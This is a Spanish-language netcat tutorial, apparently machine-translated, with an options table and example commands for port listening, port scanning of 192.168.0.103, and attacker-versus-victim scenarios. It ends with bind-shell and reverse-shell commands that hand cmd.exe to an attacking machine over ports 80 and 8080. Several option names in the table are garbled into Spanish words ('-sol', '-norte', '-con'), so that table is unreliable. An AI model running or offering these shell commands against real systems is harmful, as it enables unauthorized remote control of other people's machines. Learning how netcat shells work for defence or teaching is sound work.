NC es la abreviatura de netcat . Se conoce como la 'navaja suiza' en el campo de la seguridad de la red para leer y escribir datos a través de una conexión de red utilizando el protocolo TCP o UDP. Está diseñado como una herramienta de puerta trasera estable que puede ser manejada fácilmente directamente por otros programas y scripts. Al mismo tiempo, también es una poderosa herramienta de depuración y detección de redes que puede establecer casi todos los tipos de conexiones de red necesarias
nc [-options] hostname port [s] [ports] ...
Número de serie | Código | Efecto |
---|---|---|
01 | -re | Correr en segundo plano |
02 | -el prog | Redirección del programa, una vez conectado, ejecute el programa enlazado (más peligroso) |
03 | -sol | Punto de salto de enrutamiento de origen, no más de ocho veces |
04 | -SOL | Indicadores de enrutamiento de origen 4, 8, 12, ... |
05 | -h | Información de ayuda |
06 | -i segundos | Ajuste del tiempo de retraso, utilizado durante el escaneo de puertos |
07 | -l | Modo de monitoreo, esperando la conexión. Una vez completada la conexión, finaliza la supervisión. |
08 | -L | Modo de monitoreo, esperando la conexión. Una vez completada la conexión, continúe monitoreando |
09 | -norte | Dirección IP en forma digital |
10 | -o archivo | Especifique el código hexadecimal a transmitir |
11 | -P puerto | Especifique el número de puerto local. |
12 | -r | Especifique aleatoriamente 0 local o número de puerto remoto |
13 | -s addr | Dirección de origen local |
14 | -t | Responde solicitudes entrantes como telnet |
15 | -u | Método UDP |
dieciséis | -v | Mostrar detalles |
17 | -w | Especificar tiempo de espera |
18 años | -con | Modo de E / S, utilizado durante el escaneo |
Tales como:
1. Aplicar http / 1.1 aplicar el método GET
- Copie el comando nc en la raíz de la unidad c
- Ingrese al modo dos y retírese a la raíz
- Escriba nc -l -p 80: supervise la entrada del puerto 80
- Ingrese la dirección IP de esta máquina o 127.0.0.1 para usar el puerto 80
2. Conéctese al puerto 80
- Ingrese dos y retírese para seguir
- Escriba nc -l -p 80: supervise la entrada del puerto 80
- Luego, abra un dos telnet IP local 80 o 127.0.0.1 80 para ver el enlace
3. Analice
el estado abierto de todos los puertos 80 a 445 del host remoto 192.168.0.103
Formato: nc -nvv -w2 -z 192.168.0.103 80-445
4. Conexión directa: máquina atacante 192.168.0.100, máquina atacada 192.168.0.103
Tarea: Conecte la máquina atacante 192.168.0.100 a la máquina atacada 192.168.0.103 a través del puerto 80 y opere la unidad C de la máquina atacada en tiempo real.
Paso 1 Vincula el shell al puerto 80 en la máquina atacada 192.168.0.103.
Formato: nc -vv –l –p 80 –e cmd.exe
Paso 2 El atacante 192.168.0.100 se conecta al host 192.168.0.103 a través del puerto 80 y obtiene el shell del host remoto.
Formato: nc 192.168.0.103 80
entrenamiento 5 Conexión inversa: máquina atacante 192.168.0.100, máquina atacada 192.168.0.103
Tarea: conexión inversa desde la máquina atacante 192.168.0.100 a la máquina atacada 192.168.0.103 a través del puerto 8080 Y operación en tiempo real de la unidad C de la máquina atacada.
Paso 1 El atacante 192.168.0.100 supervisa su puerto 8080.
Formato: nc -vv –l –p 8080
Paso 2 La máquina atacada 192.168.0.103 une el shell al puerto 8080 del atacante, de modo que el atacante obtiene inversamente el shell de la máquina atacada.
Formato: nc –e cmd.exe 192.168.0.100 8080